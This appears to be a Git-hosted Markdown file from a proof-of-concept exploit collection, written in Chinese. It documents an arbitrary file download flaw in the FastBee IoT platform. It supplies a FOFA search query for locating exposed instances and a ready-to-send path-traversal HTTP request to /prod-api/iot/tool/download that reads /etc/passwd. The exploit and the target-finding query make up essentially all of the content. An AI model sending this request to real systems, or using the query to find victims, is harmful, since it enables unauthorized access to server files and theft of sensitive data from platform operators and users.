wy876_POC/蜂信物联/蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞.md
2024-09-02 10:54:47 +08:00

19 lines
466 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞
蜂信物联(FastBee)物联网平台download存在任意文件下载漏洞可能导致敏感信息泄露、数据盗窃及其他安全风险从而对系统和用户造成严重危害。
## fofa
```javascript
"fastbee"
```
## poc
```javascript
GET /prod-api/iot/tool/download?fileName=/../../../../../../../../../etc/passwd HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
```